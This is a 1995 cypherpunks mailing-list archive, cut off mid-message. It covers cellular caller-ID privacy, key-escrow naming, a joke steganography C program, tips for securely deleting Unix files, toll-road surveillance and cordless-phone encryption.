1995 05:06:00 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512152036.OAA13659@cdale1.midwest.net> >Not. As of 12/1/95, the FCC requires all cellular carriers (and IXCs for >that matter) to transmit ANI & CLID information, even on cellular calls. >BellSouth thoughtfully put a notice in my last two monthly bills, but then >again I think the FCC required that too. > >-Paul At least I know that my cellular carrier is safe for now. The phone company in our area still can't handle ANI from the cellular switch. The default number for our carrier ends in 0000 which happens to be my number. I get calls every month from people with 800 numbers verifying what number this was. I have to explain that someone from our cellular system made a call to their number but the bill defaults to mine. Its no big deal since I work for the cellular carrier though. ;) Dr0id From jya at pipeline.com Fri Dec 15 13:54:15 1995 From: jya at pipeline.com (John Young) Date: Sat, 16 Dec 1995 05:54:15 +0800 Subject: INT_mes Message-ID: <199512151914.OAA04065@pipe1.nyc.pipeline.com> The WP, Dec 15, 1995: Internet Mess: Return to Sender [Editorial] The negotiations between House and Senate conferees on the restriction of pornography in cyberspace have gone from bad to worse. A tentative accommodation arrived at last night, which the conferees must still vote to accept or kill, combines some of the worst of a broad array of misguided restrictions on speech, none of them likely to protect children. INT_mes Digital claims that its new crawler called Alta Vista, can find data on the World Wide Web at speeds of up to 100 times faster than currently popular crawlers from Yahoo Corp., Open Text Corp. or Lycos Inc. From samman-ben at CS.YALE.EDU Fri Dec 15 14:01:17 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Sat, 16 Dec 1995 06:01:17 +0800 Subject: .PWL spin In-Reply-To: <199512151829.KAA13449@jobe.shell.portal.com> Message-ID: > What would make a University less secure than a corporation?? Ostensibly, universities in the interest of academic freedom and promoting learning usually don't have nearly the same draconian measures that corporations have. They don't have to worry nearly as much about trade secrets being mailed out he front door, or information warfare attacks in which a competitor is attempting to penetrate the system. > Universities (at least the ones, I've checked) have entire departments > and theoreticians devoted to Computers ... companies usually don't. And those theoreticians sit behind their desks and keep scribbling on their pads. There's not much going on the ground with theory. Plus, if you knew anything about theory, a lot of theory has very little immediate practical importance...complexity theory is good to make sure that one-way functions actually do exist, but in progress, there's not much way to implement it. Ben. ____ Ben Samman..............................................samman at cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman at powered.cs.yale.edu for key Anyone want to give a college grad a job? Mail me for a resume. From rah at shipwright.com Sat Dec 16 06:32:16 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 16 Dec 95 06:32:16 PST Subject: e$: Seven Days Message-ID: At 6:36 AM 12/16/95, Timothy C. May wrote: >By the way, in honor of the "geodesic network" and "geodesic payment >systems," and the geodesic dome the party was in, I propose we rename "e$" >with a more fitting name: "buckybucks." Or just "buckys" for short. ("Did >you remember to replenish the buckybits?") Snoop Bucky Bucks? Sounds like a Cyberdog part to me... Maybe not... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From mphillips at CCTR.UMKC.EDU Fri Dec 15 14:36:57 1995 From: mphillips at CCTR.UMKC.EDU (mphillips at CCTR.UMKC.EDU) Date: Sat, 16 Dec 1995 06:36:57 +0800 Subject: Apology... Message-ID: <0099AE8C.9140398E.3@CCTR.UMKC.EDU> To all concerned: I, have recieved SEVERAL messages regaurding a post that was sent to this newsgroup. I am apologizing for such a mistaken address and post. Please accept my sincere apology and believe me when I say that I have NEVER meant to offend anyone. This was a situation that WE have taken care of HERE and I hope never happens again. Again, please accept my apology and I hope we can consider this subject closed. From frantz at netcom.com Fri Dec 15 14:49:01 1995 From: frantz at netcom.com (Bill Frantz) Date: Sat, 16 Dec 1995 06:49:01 +0800 Subject: "Strongly Voluntary" Key Escrow Message-ID: <199512152102.NAA27308@netcom19.netcom.com> At 9:10 12/15/95 -0500, Jim Ray wrote: >"Government Key Certification" might be an OK compromise-term compared >to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As >you know, I prefered the term "FUCKED," but now we must be "decent" in >our communications. I suggest Forced Key Deposit (FKD) (when some non-governmental entity e.g. an employer forces you to send copies of your keys to some depository), and Voluntary Key Deposit (VKD), when you chose to deposit a copy of your key with some third party. I love the way GAK sounds, so I support it even the whole concept is really FUCKED. Whenever I hear, "Government Key Certification", I think of digital signatures, not communication privacy. ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From futplex at pseudonym.com Fri Dec 15 15:42:44 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 16 Dec 1995 07:42:44 +0800 Subject: Attacking Clipper with timing info? In-Reply-To: <9512140458.AA25132@bilbo.suite.com> Message-ID: <199512140807.DAA19083@opine.cs.umass.edu> Jim Miller writes: > That brings up an issue I occasionally think about...At what point does > NSA's secrecy become more of a liability than an asset. Should the NSA > reveal flaws in crypto-systems in wide use here in the US to protect US > companies and individuals from attack or should they remain quite so they > can exploit them in the interests of national security? As usual, I speak at most for myself. But I think it's pretty safe to say that most people here believe the privacy interests of individuals (and companies) outweigh the allegedly conflicting "national security" interests of the countries in which we reside. A great deal has been written (more eloquently) on this point. The NSA doubtless believes it has a "national security" interest in knowing the contents of my communications with my very good friend in the USAF. I strenuously disagree. This is one of the reasons I devote so much of my time to, er, cypherpunking :) (It has also been noted by many before me that preserving the privacy of U.S. entities is a significant national security interest in and of itself.) -Futplex "The guys in the powdered wigs had it about right in 1792, and there's good reason why in 200-plus years we have not amended the Bill of Rights, which is what this legislation would do." -White House Press Secretary Michael D. McCurry, commenting on the Administration's position on the proposed flag desecration amendment to the U.S. Constitution From dlv at bwalk.dm.com Fri Dec 15 15:46:44 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sat, 16 Dec 1995 07:46:44 +0800 Subject: Pornographic stories In-Reply-To: <199512130602.WAA02645@netcom9.netcom.com> Message-ID: jadestar at netcom.com (JaDe) writes: > > > > Daniel Miskell writes: > >>>I'm sure. > > > I too fail to see the cryptorelevance of this thread... Unless > > alt.sex.stories is used for steganography... Alice wants to send a > > secret message to Bob, so she posts a porn story to alt.sex.stories, > > where the key phrase is "That was the best sex I've ever had", which > > sounds like a mild hyperbole to most people; > > I like the stegonography angle. However I'd encode the > actual message contents into the typos. Filter out the > typos to retrieve your crypto-text. Wouldn't text with a lot of typoes look suspicious? For ultimate silliness, I've put together the following program to encode 8 bits at a time in an R-rated sentence: #include #define BIT(c,n) ((c>>n)&1) const char*bits[]={ "Senator Exon", "L.Ron Hubbard", "made passionate love to", "had great sex with", "Hillary Klinton", "J.D.Falk", "experienced", "gave her", "six", "twelve", "in", "during", "one", "a single", "night", "weekend"}; void stegaporn(int c) { printf("%s %s %s and %s %s orgasms %s %s %s. ", bits[BIT(c,7)], bits[2+BIT(c,6)], bits[4+BIT(c,5)], bits[6+BIT(c,4)], bits[8+BIT(c,3)], bits[10+BIT(c,2)], bits[12+BIT(c,1)], bits[14+BIT(c,0)]); } int main(void) { int c; while (EOF!=(c=getchar())) stegaporn(c); return(0); } > Ultimately I think that the whole issue of legal cryptography > actually boils down to this: > > If you illegalize strong crypto than criminals will > simply resort to steganography and "hidden" channels > of communication (in which they can also embed/tunnel > the crypto-text of their strongly encrypted data). > > Therefore all you've done is create a lesser crime > for the real criminals and make people with valid > (non-criminal) uses of the technology into criminals. > > Unfortunately this reasoning doesn't help at all with our > (U.S.) legislature. There is some hidden aggenda as to > why "they" really want strong cryptography to be difficult > for the average user to obtain. I have a uniquely hard time > believing that "they" are merely concerned that "we" might > be pursuing simple privacy (even if cryptography were already > illegal I could use it for years and never get "caught." > so long as I was using non-broadcast channels and communicating > with "trusted" associates (fellow "crypto-criminals") > > In fact I've suggested to several people that we start > a dial-up uucp revival for this and related reasons. (If > the number of users/webpages and the bandwidth usage continues > to increase at the recent rates -- without a corresponding > improvement in the infrastructure we'll probably all want to > go back to uucp for mail and news anyway. Old fashioned dial-up > may be faster than T1 access in a few years and direct point-to- > point uucp over ISDN is probably faster already. > > So: > > What is the "real" reason for opposition to > strong crypto? Who "really" benefits? (and please > don't mention the LE types 'cause I don't believe it). > > and: > Anyone else want to participate in the great '90's > uucp revival? I'm in Santa Clara and could use > some feeds and some help with the setup. I'm all for it. My site is connected to the rest of the world via dial-up UUCP, I haven't touched the setup in 5 years, and am not planning to. It might be interesting to have a variation of dial-up UUCP where site 1 passes encrypted stuff to site 2 and doesn't quite know what site 3 they're supposed to go on to. Sort of like the remailers with encryption. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From EALLENSMITH at ocelot.Rutgers.EDU Fri Dec 15 16:21:12 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sat, 16 Dec 1995 08:21:12 +0800 Subject: ADDRESS DATABASE? Message-ID: <01HYUF22RDD08Y50QR@mbcl.rutgers.edu> From: IN%"jpp at software.net" "John Pettitt" 14-DEC-1995 16:34:23.37 >On the name database side the PO runs somthing called National Change of Address which tracks who moved where and allows direct marketing companys to clean their lists. Almost everybody sells address change data (utilities, the PO, credit companys) - I'm getting tons of "welcome to the neighbourhood" mail since I moved. -------------- The basic method for getting around this is to have the mail forwarded to a post office box. They still know you've moved, but not to where, and the connection between your physical location (for stuff like gas bills, etcetera) and the name & address that they did have is loosened. -Allen From gibo at ripco.com Fri Dec 15 16:36:47 1995 From: gibo at ripco.com (Giles Bowkett) Date: Sat, 16 Dec 1995 08:36:47 +0800 Subject: QUERY: e-politics mailing list Message-ID: Does anyone know of a mailing list organized around political issues regarding electronic networks, virtual community, the changing roles of the city and the corporation, and especially issues of class in a "wired" world? Much thanx, pls pardon the spam. PS - be careful about replying to all recipients - this message went to a couple different lists. =========================================>>>http://pages.ripco.com/~gibo "I drink coffee for taste only. You just can't make coffee strong enough to compete with pharmaceutical speed, so fuck it." -- Dave Fischer From jlasser at rwd.goucher.edu Fri Dec 15 17:46:59 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Sat, 16 Dec 1995 09:46:59 +0800 Subject: NET - HLR on highway privacy (fwd) Message-ID: I hadn't seen this cross the list yet... ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. ---------- Forwarded message ---------- Date: Mon, 11 Dec 1995 05:59:53 -0600 From: FringeWare Daily Subject: NET - HLR on highway privacy Sent from: hlr at well.com (Howard Rheingold) We Need Privacy Protection On Intelligent Highways -- By Howard Rheingold Ominous steps have been taken recently, steps that perhaps move us all closer to a global surveillance state, but few people are aware of them. Governments around the world are installing "intelligent highways," whose snooping capabilities ought to concern every driver. I recently remarked to my friend Peter, as he drove me around Geneva, that he is scrupulous about obeying the speed limit. He told me in reply that he had on a previous occasion received in his mailbox an envelope containing a photograph of his automobile, the radar detector readout superimposed, along with a notice of his fine. On key Swiss roads, radar detectors automatically videotape speeders, computers automatically recognize the license plate number, check it against a database, and issue mail to the home address of the owner. It happens in Japan, too, and more and more locations around the world.. If my Swiss friend had not told me that story, the hair on the back of neck would not have started to stand up when I read, the next day, in the October 9, 1995 edition of the International Herald Tribune, that Kansas became the tenth state to adopt electronic toll collection. Electronic transponders installed in vehicles automatically communicate with toll collecting machinery via radio, and tolls are automatically deducted from the driver's account. The following day, October 10, the same newspaper reported that Singapore had announced contracts to wire up the road system of the entire city-state. Singapore, never known as a bastion of civil liberties, will be able to track the location of every vehicle, and identify most drivers, on a minute-by-minute basis. A government and private industry initiative now underway proposes multibillion dollar investments in "Intelligent Vehicle Highway Systems" (IVHS) in the US. These systems, combining massive numbers of embedded sensors, video cameras, chips embedded in vehicles, and even satellite global positioning signals, are now under construction in every industrialized country. IVHS promise greater convenience and perhaps safety by monitoring highway traffic, routing around jams, and automatically collecting tolls. If these systems are not designed with the privacy of citizens in mind, however, we might be buying a heap of surveillance capabilities for future secret police. This is a technology policy issue where informed groups of citizens can have an impact if we act now. It isn't a matter of banning the technology. It's a matter of making sure today that these systems are designed with the privacy of future citizens in mind. One of the best sources of information about the social impact of IVHS comes from Professor Phil Agre at the University of California, San Diego. Agre stated recently: "Society may decide that it wishes to provide law enforment with generalized abilities to track citizens' movements, but this would clearly be a grave decision - one that should be discussed well in advance rather than building the technical capabilities into ITS systems with virtually no public discussion." There is a technical fix, however. Encryption techniques make it possible to transmit account information from an automobile without disclosing the identity of the owner. However, it is critically important that the early majority of transponder manufacturers build encryption capabilities into their devices. Making privacy a standard will work far better than attempts at legislative regulation after the market has settled on a standard. Agre's reports can be found on the Web at http://communication.ucsd.edu/pagre/rre.html. To access his whimsically-named but extremely useful "Red Rock Eater News Service," via e-mail send a message to rre-request at weber.ucsd.edu, Subject: archive help. We still have time to do something about this one. We need to ask manufacturers now to consider the importance of building privacy protection into their technology. I support Agre's statement that "People need to use roads to participate in the full range of associations (educational, political, social, religious, labor, charitable, etc) that make up a free society. If we turn the roads into a zone of total surveillance then we chill that fundamental right and undermine the very foundation of freedom." END From dan at milliways.org Fri Dec 15 19:57:03 1995 From: dan at milliways.org (Dan Bailey) Date: Sat, 16 Dec 1995 11:57:03 +0800 Subject: Motorola Secure Phone Message-ID: <199512152338.XAA22526@pop01.ny.us.ibm.net> I saw a new cordless phone made by Motorola in a retail outlet today that is supposedly "Secure from eavesdroppers." I asked the salespeople for more technical info, but they weren't very helpful. Does anyone have any information on this? I didn't notice any "Not for Export" stickers on the box, and the ITAR does cover spread-spectrum technology. So is it analog or digital? Is it just doing simple analog tricks, or is it encrypting a bitstream? Clipper maybe? I doubt it. Any info appreciated. Dan *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From frogfarm at yakko.cs.wmich.edu Fri Dec 15 19:57:56 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sat, 16 Dec 1995 11:57:56 +0800 Subject: ADDRESS DATABASE? In-Reply-To: <199512152023.OAA13271@cdale1.midwest.net> Message-ID: <199512160020.TAA00404@yakko.cs.wmich.edu> andr0id at midwest.net writes: > > > >My untrained brain sees two problems with this: > > > >1) Cellular systems are inherently less secure than standard telephones, > >as anyone who can afford a decent scanner can listen to your conversations > >at will. > > I was speaking more secure in that the billing information is much harder to > get. If someone had the time, money, and equipment to track a particular > person at a specific location making a cellular phone call from a given > number they would most likely already have the means of getting the > information an easier way. I'm not familiar with this aspect - how do cellular services store and make use of billing information, as opposed to traditional phone services? > At least 50% of the cellular carriers are not telco related. Giving out > cellular numbers and names is a tabbo NONO for cellular carriers. If > cellular customers start getting sales calls from a company that received a > list from a cellular carrier, the cellular carrier is obligated to refund > the customers bill for those calls if the customer complains becuase the > customer pays for calls comming or going. Is this obligation incurred by the contract between the customer and the cellular service, by statute, or otherwise? Contracts can always be broken, and passing laws to guard the guardians generally amounts to having the fox guard the henhouse... > I don't feel that cellular is completely private or secure but its getting > much better with the addition of digital cellular. The problem with digital > is that the conversations are more secure but the information about the > people calling is not. Digital cellular and PCS offers ANI and a bunch of > other identifying information. This seems par for the course - the rise of ESS sounded the death knell for traditional blue boxing. Conversion to digital makes everything easier, including tracing. Therefore, it behooves us to recognize good and bad aspects of technology, the better to "take what you can use, and let the rest go by." (Ken Kesey) (Whatever happened to Apple's bid to give away a huge chunk of the bandwidth spectrum? Did the FCC ever get around to addressing their request? As Bill Frezza said, *that* took cojones...) -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona Hate, hate your enemies save, save your friends find, find your place I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right. From stripes at va.pubnix.com Fri Dec 15 20:38:55 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Sat, 16 Dec 1995 12:38:55 +0800 Subject: Secured RM ? (source) In-Reply-To: Message-ID: In message , root w rites: > >OK ... here we go.. Based on discussion on this list this is what I >hacked out to (hopefully) more securely remove a file under unix. >I'd really apreciate any input, but my main interest is in the security of >the protocol in general and not the sloppy and embarassing C >programming.. :) Well it seems to assume that it only needs to write 1024 bytes past the end of the file. You either don't need to write any bytes at all past the end, or you need to write one "block" past the end (normally 8K, but it varies), you can use fsstat(2) on many systems to find the block size for a filesystem. Secondly you need to flush the data out to the file (use fflush(3), and fsync(2) if available, otheruse call sync(2) *twice*). If you don't some small set of Unix systems may notice that you are writing to a file that no longer exists, and not do the writes at all. Thirdly you should make several passes over the file, writing diffrent patterns on each pass (and remember the flush & sync after each pass - while it is uncommon for Unix systems to supres writes to unlinked files it is extreamly common for them to detect multiple writes to the same part of a file, and only do the last one). Forth - and this is the kicker - there is no gaurentee that the filesystem itself won't keep a copy of the old data for some reason. Three examples: * a compressed filesystem may write the new data elsewhere because it compresses diffrently from the old data - you should be able to defeat this by filling the disk several times with random paterns * the log structured filesystem (LFS) *will* write the new data elsewhere, and the space the old data is on will not be overwritten untill the cleaner comes and examines the part of the disk it is on - again filling the disk several times with random patterns should cause an overwrite * NetApp's NFS appliance ("the toaster") can (and normally is) configured to take "snapshots" of the filesystem at various times, this makes the blocks the file is currently on read-only, and any ovewrites will merely allocate new space. The old copy of the file will be readable for some peroid of time (frequently up to a week) under a diffrent name - here you will be unable to fill the disk (unless you are the NetApp admin - then you can delete the appropriate snapshots and fill the disk...) While we are at it you probbably want to use stat(2) to find the length of the file, and you can get far more I/O if you allocate a sizeable chunk of memory (say 1K, or 8K) and use writev(2) to shove multiple copies of it out per syscall... and some indenting on the code would make it more readable (and simpler for you to write as well). >While we're here.. I havn't been able to find anyone on the planet who's >seen or heard of a linux un-remove, which makes testing my code very >tricky. If anyone can point me at it I'd apreciate it. Hell, if someone >can definitively say they've /seen/ such a thing it'd be nice. So far >i've found one person who insists that his system admins sisters >boyfriends cousin from Saint Petersburg has been using un-rm for unix for >years. *sigh* I don't know of a real un-rm. In "the old days" there was a fsdb (filesystem debugger) that could be used to alter the filesystem at a low level. If you knew enough you could "un-rm" a file. It had to be a very valuable file to be worth it!). At some sites they alias rm to do something like "mv $1 .$1.deleted", making an un-rm is left as an exercize for the intrested reader. From tcmay at got.net Fri Dec 15 20:41:21 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Dec 1995 12:41:21 +0800 Subject: Alien Abductees, Flat Earthers, and other Fringoids Message-ID: At 11:37 PM 12/15/95, Giles Bowkett wrote: >Does anyone know of a mailing list organized around political issues >regarding electronic networks, virtual community, the changing roles of >the city and the corporation, and especially issues of class in a "wired" >world? > >Much thanx, pls pardon the spam. Don't mention it! After all, all right-thinking Cypherpunkz are intensely interested in these mailing lists you sent this to: abducted at hyperreal.com (many Cypherwonks are alien abductees!) flat-earth at zikzak.net (where the "edge" culture meets the edge of the Earth) email at fringeware.com (yes, we're at the fringe) So nice to know that we're lumped in with these folks. --Tim "Dr. Bob" May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From andr0id at midwest.net Fri Dec 15 21:08:55 1995 From: andr0id at midwest.net (andr0id at midwest.net) Date: Sat, 16 Dec 1995 13:08:55 +0800 Subject: personal privacy Message-ID: <199512152202.QAA16464@cdale1.midwest.net> Well, as of about two days ago IL passed a bill that says employers can listen to their workers phone calls all they want. Dr0id From Kevin.L.Prigge-2 at cis.umn.edu Fri Dec 15 21:09:13 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Sat, 16 Dec 1995 13:09:13 +0800 Subject: .PWL spin In-Reply-To: <199512151829.KAA13449@jobe.shell.portal.com> Message-ID: <30d1d41c0e04002@noc.cis.umn.edu> According to rumor, anonymous-remailer at shell.portal.com said: > > > On Sat, 9 Dec 1995, Joel McNamara wrote: > > > One system administrator said the problem would have a greater effect on > > less-secure environments, such as universities and other institutions, > > than on corporations. > > I didn't quite understand the "corporate speak" here. It sounds like > something coming from Bosnia or something. It's Greek to me. > > What would make a University less secure than a corporation?? 1) Usually more net connected hosts. 2) Lack of adequate sysadmin attention/knowlege. 3) Vague and poorly enforced site security policies. This is of course a generalization, but corporations seem to have more money and time to throw at security. On the other hand, it's common at Universities to get a new Sun/SGI/whatever, hook it to the net, and run it without spending a lot of time configuring it. > > Universities (at least the ones, I've checked) have entire departments > and theoreticians devoted to Computers ... companies usually don't. Just because a University has a CS department doesn't mean that it is more secure. Even if security is an area of study, it doesn't mean that other departments benefit from the research. > > I'd think that Universities are much, much more secure environments than > corporations are. Doesn't Microsoft know this?? Or is this unique to > Seattle?? I don't know what University sites you're referring to, my experience has been that on the average, .edu sites are less secure than .com sites. -- Kevin L. Prigge |"A computer lets you make more mistakes faster UofM Central Computing | than any invention in human history--with the email: klp at umn.edu | possible exceptions of handguns and tequila." 01001001110101100110001| - Mitch Ratcliffe From andr0id at midwest.net Fri Dec 15 21:09:15 1995 From: andr0id at midwest.net (andr0id at midwest.net) Date: Sat, 16 Dec 1995 13:09:15 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512152023.OAA13271@cdale1.midwest.net> >> any type of billing information to the phone company. The number is also by >> nature unlisted and the only way to get it is by you or the cellular >> carrier. If the cellular carrier gives your number out without your >> permision or a court order they are in BIG trouble.. > >My untrained brain sees two problems with this: > >1) Cellular systems are inherently less secure than standard telephones, >as anyone who can afford a decent scanner can listen to your conversations >at will. I was speaking more secure in that the billing information is much harder to get. If someone had the time, money, and equipment to track a particular person at a specific location making a cellular phone call from a given number they would most likely already have the means of getting the information an easier way. >2) You're relying on someone other than yourself to protect your security, I do agree that letting anyone other than yourself control your personal information is bad! It happens all to often. >which is always a bad idea. Cellular carriers, Ma Bell, anyone. Does anyone >on this list really believe that representatives of these organizations >would think twice about bending over and spewing out everything they know >about you? They do it all the time, without your permission and without >valid court orders. At least 50% of the cellular carriers are not telco related. Giving out cellular numbers and names is a tabbo NONO for cellular carriers. If cellular customers start getting sales calls from a company that received a list from a cellular carrier, the cellular carrier is obligated to refund the customers bill for those calls if the customer complains becuase the customer pays for calls comming or going. I don't feel that cellular is completely private or secure but its getting much better with the addition of digital cellular. The problem with digital is that the conversations are more secure but the information about the people calling is not. Digital cellular and PCS offers ANI and a bunch of other identifying information. Dr0id From jadestar at netcom.com Fri Dec 15 21:17:13 1995 From: jadestar at netcom.com (JaDe) Date: Sat, 16 Dec 1995 13:17:13 +0800 Subject: "Strongly Voluntary" Key Escrow In-Reply-To: <199512152102.NAA27308@netcom19.netcom.com> Message-ID: <199512160052.QAA04337@netcom.netcom.com> > > At 9:10 12/15/95 -0500, Jim Ray wrote: > >"Government Key Certification" might be an OK compromise-term compared > >to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As > >you know, I prefered the term "FUCKED," but now we must be "decent" in > >our communications. > > I suggest Forced Key Deposit (FKD) (when some non-governmental entity e.g. > an employer forces you to send copies of your keys to some depository), and > Voluntary Key Deposit (VKD), when you chose to deposit a copy of your key > with some third party. I love the way GAK sounds, so I support it even the > whole concept is really FUCKED. Whenever I hear, "Government Key Bill, You may really have something here. Let's recommend a Forced Universal Cryptographic Key and Engine Depository. When they, naturally, build the acronym -- they'll have spelled out the situation clearly From adam at lighthouse.homeport.org Fri Dec 15 21:21:00 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 16 Dec 1995 13:21:00 +0800 Subject: Secured RM ? (source) In-Reply-To: Message-ID: <199512150218.VAA14539@homeport.org> | | While we're here.. I havn't been able to find anyone on the planet who's | seen or heard of a linux un-remove, which makes testing my code very | tricky. If anyone can point me at it I'd apreciate it. Hell, if someone | can definitively say they've /seen/ such a thing it'd be nice. So far | i've found one person who insists that his system admins sisters | boyfriends cousin from Saint Petersburg has been using un-rm for unix for | years. *sigh* From comp.unix.questions FAQ: (http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html) MIT's Project Athena has produced a comprehensive delete/undelete/expunge/purge package, which can serve as a complete replacement for rm which allows file recovery. This package was posted to comp.sources.misc (volume 17, issue 023-026) -- "It is seldom that liberty of any kind is lost all at once." -Hume From pcw at access.digex.net Fri Dec 15 21:38:17 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sat, 16 Dec 1995 13:38:17 +0800 Subject: More Balto Sun on the NSA: Infowar Message-ID: The last part of the Baltimore Sun's series of articles on the NSA arrived today. It concentrated upon the prospect for a bloodless "Infowar." The article began with a hypothetical attack beginning on January 17, 2001, the tenth anniversary of the US bombing of Baghdad. In the attack, bad, computer related things happen like stock markets crash and all of the money is drained from the accounts of the sailors in the US Navy. The article then uses this as a beginning for a long contemplation of the NSA's future. Many of the details are well-known to cypherpunks. The NSA is poking around with drug interdiction, economic intelligence and computer security. The Russian linguists are being retrained. Etc. The article ends with a story told by Senator Rudman of NH. He says that 100 years ago, the houses were wood and we needed fire stations on every corner. Now, they're made of brick and concrete and come with sprinkler systems. The Fire Union might argue that you still need a fire station on every corner, he told the reporter, but that's not necessarily true. So, perhaps Clipper is a form of job insurance? True perfect security would not only hurt SIGINT, but it would remove the need for crypto firemen. If you want to have a system that gives some people access and not other people, then you need a lot of folks to stand around, sign forms and generally make sure that everything is running smoothly. Strong cryptography is automation. GAK requires a large bureaucracy to administer it. The article also has some anecdotes about how the agency protected US firms abroad. One company was alerted that its European competitor was bribing the Latin American officials who were choosing the winning bid. Also, when the Peso collapsed, the US negotiators had access to some information that the Mexican government wasn't being as forthcoming as they should have been about the country's assets. They used this information in negotiations. --Peter Wayner You can purchase the complete articles from the Baltimore Sun by dialing 410-332 6962. The price is $3.95. (See my second post for more info on an earlier article about Crypto AG). From jhupp at novellnet.gensys.com Fri Dec 15 21:39:47 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Sat, 16 Dec 1995 13:39:47 +0800 Subject: NET - HLR on highway privacy (fwd) Message-ID: <4B9D401DA6@Novellnet.Gensys.com> -----BEGIN PGP SIGNED MESSAGE----- On 15 Dec 95 at 13:54, Jon Lasser wrote: : I hadn't seen this cross the list yet... : : ------------------------------------------------------------------------------ : Jon Lasser (410)494-3072 : Visit my home page at http://www.goucher.edu/~jlasser/ : You have a friend at the NSA: Big Brother is watching. Finger for PGP key. : : ---------- Forwarded message ---------- : Date: Mon, 11 Dec 1995 05:59:53 -0600 : From: FringeWare Daily : Subject: NET - HLR on highway privacy : : Sent from: hlr at well.com (Howard Rheingold) : : We Need Privacy Protection On Intelligent Highways : -- By Howard Rheingold : : Ominous steps have been taken recently, steps that perhaps move us : all closer to a global surveillance state, but few people are aware of them. : Governments around the world are installing "intelligent highways," whose : snooping capabilities ought to concern every driver. [ Much about automatic tool billing and how it can be used to track vehicles deleted.} The MTA (the people who 'run' the toll roads about Houston) have an automatic payment system in place that use transponders mounted on windshields. Most people who have these don't know it, but they have pickups for these little devices all over the freeway system, not just at the toll booths. But if you go to http://herman.tamu.edu/houston-real.html you can get an idea of what they are able to do with the data. And then they have the lobes to ask you to volunteer to put one of these things on your car. What boggles the mind, is that people do... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMNIdqjUjeCeeebC9AQG7XAf/YgxgSAhNrsEFMtjUtS4UrzTVNhEkzBK6 IQv+LMb45B/niD+fQYKmViTu8ki/jEoBZ4zLEmSLmrE8Gl0vhmSgnYCoLjVeURxo k4JEf3uYRCrGWt94hihiLl+2GahqkPdaxBdksGVR0DHAF6SIWKbwvh0LRgDiUcOT lQ6Cb9AwthPuX2BYx/1kmijABSwsEJYv2mF7J3mWwqR/3C9u92thMqfMVPIWkPfn mzgK+/OROzug2nPjIZ2ULhbJYY05mrVr0JD70kmBoThH1kqt8+1xU9v9HeziZl/y WZ8b24i3rKxLZq4PaPMsKX6TlWpIlnJt4QPTwVt4gr0sRwuY4I37sw== =GJjw -----END PGP SIGNATURE----- -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com The difference between science and the fuzzy subjects is that science requires reasoning, while those other subjects merely require scholarship. From trei at process.com Fri Dec 15 21:45:21 1995 From: trei at process.com (Peter Trei) Date: Sat, 16 Dec 1995 13:45:21 +0800 Subject: Motorola Secure Phone Message-ID: <9512160230.AA27216@toad.com> Sameer wrote > > My AT&T 900 (or is it 9000?) MHz digital cordless phone says > the same thing. I figure it uses a weak cryptosystem. There is > something about key setup when you return the handset to the base. > (The phone was $200, FWIW) > Dan wrote: > > I saw a new cordless phone made by Motorola in a retail outlet today > > that is supposedly "Secure from eavesdroppers." I asked the > > salespeople for more technical info, but they weren't very helpful. > > Does anyone have any information on this? I didn't notice any "Not > > for Export" stickers on the box, and the ITAR does cover > > spread-spectrum technology. So is it analog or digital? Is it just > > doing simple analog tricks, or is it encrypting a bitstream? Clipper > > maybe? I doubt it. Any info appreciated. > > Dan I've also got an ATT 9000. It's one of the digital 900Mhz phones, and has no encryption. It claims extra security due to being digital - your average 14 year old's scanner is analog only. There's a bunch of frequencies. The frequency to use, and (fairly small (16bit?) security code gets reset when the receiver is put on it's stand. The code is used only for a handshake, so several phones in the same area won't interfere by accident. It is not frequency agile - the same freq is used throughout the call. It's a good phone - nice tone, long range, and it's secure against jerks with scanners. Secure against serious eavesdroppers it's not. When I bought it a year or so ago, I also looked at another phone from (I think) Uniden, which *was* frequency agile. I was 